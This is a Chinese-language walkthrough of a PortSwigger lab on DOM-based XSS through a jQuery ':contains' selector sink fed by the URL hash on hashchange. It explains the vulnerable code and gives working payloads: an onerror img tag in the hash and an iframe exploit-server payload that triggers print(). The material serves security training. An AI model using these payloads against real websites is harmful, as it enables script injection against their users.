【Portswigger : DOM XSS in jQuery selector sink using a hashchange event】

一句话解释这个漏洞:

攻击者把恶意代码放进URL的#后面,网站傻傻地把这段代码当成选择器的一部分执行,结果浏览器把这段"选择器"当成了HTML标签创建并执行了其中的JavaScript。

看看前端代码

$(window).on('hashchange', function(){
var post = $('section.blog-list h2:contains(' + decodeURIComponent(window.location.hash.slice(1)) + ')');
if (post) post.get(0).scrollIntoView();
});
关键部分解释
  1. 事件监听$(window).on('hashchange', function(){...})

    • 监听 window 对象的 hashchange 事件,当浏览器地址栏中 # 后面的哈希值发生变化时(比如从 #标题1 变成 #标题2),就会执行这个回调函数。
  2. 哈希值处理

    • window.location.hash:获取地址栏的哈希值(包含 #,比如 #Java入门)。

    • 控制台输入window.location.hash

      • .slice(1):去掉开头的 #,得到纯文本(比如 Java入门)。
    • decodeURIComponent():解码 URI 编码的字符(比如处理 %20 这类空格编码),避免中文 / 特殊字符匹配失败。

  3. 元素查找

    • $('section.blog-list h2:contains(...)'):在 <section class="blog-list"> 标签下,查找所有包含指定文本的 <h2> 标签(也就是博客标题)。
    • 注意::contains 是 jQuery 选择器,匹配包含指定文本的元素,匹配是大小写敏感的。
  4. 滚动到视图

    • post.get(0):把 jQuery 对象转换成原生 DOM 元素(因为 scrollIntoView() 是原生 JS 方法)。
    • scrollIntoView():让找到的元素自动滚动到浏览器可视区域的顶部(默认行为)。
    • 原代码中 if (post) 其实不够严谨,因为即使没找到元素,post 也是一个空的 jQuery 对象(布尔值为 true),应该改成 if (post.length > 0)

    https://0abd00710449d45fca56979b007600ea.web-security-academy.net/# <img src="x" onerror=alert(777)>

提示要用print打印机

bash 复制代码
https://0abd00710449d45fca56979b007600ea.web-security-academy.net/#%20%3Cimg%20src=%22x%22%20onerror=print()%3E

使用exploit server

iframe嵌入攻击:

iframe标签用于加载嵌入外部内容。

bash 复制代码
<iframe src="https://0acb007a0425916d804c03c000830035.web-security-academy.net/#" onload="this.src += '<img src=# onerror=print()>'"></iframe>

store(存储)并执行viewexpliot


相关推荐
滴水未满2 小时前
uniapp的工程
前端·uni-app
专家大圣2 小时前
Tomcat+cpolar 让 Java Web 应用跨越局域网随时随地可访问
java·前端·网络·tomcat·内网穿透·cpolar
光影少年2 小时前
前端如何实现一个高精准定时器和延时器
前端·javascript·react.js·web·ai编程
假装我不帅2 小时前
传统html方式开发spreadjs
前端·html·spreadjs
夏河始溢2 小时前
一七九、WebRTC介绍
前端·人工智能·ui
六月June June2 小时前
vue3 antd3.x ant-table组件 鼠标移入行出现tooltip
前端·vue.js·table·ant-design-vue
2501_944424124 小时前
Flutter for OpenHarmony游戏集合App实战之连连看路径连线
android·开发语言·前端·javascript·flutter·游戏·php
search711 小时前
前端设计:CRG 3--CDC error
前端
治金的blog11 小时前
vben-admin和vite,ant-design-vue的结合的联系
前端·vscode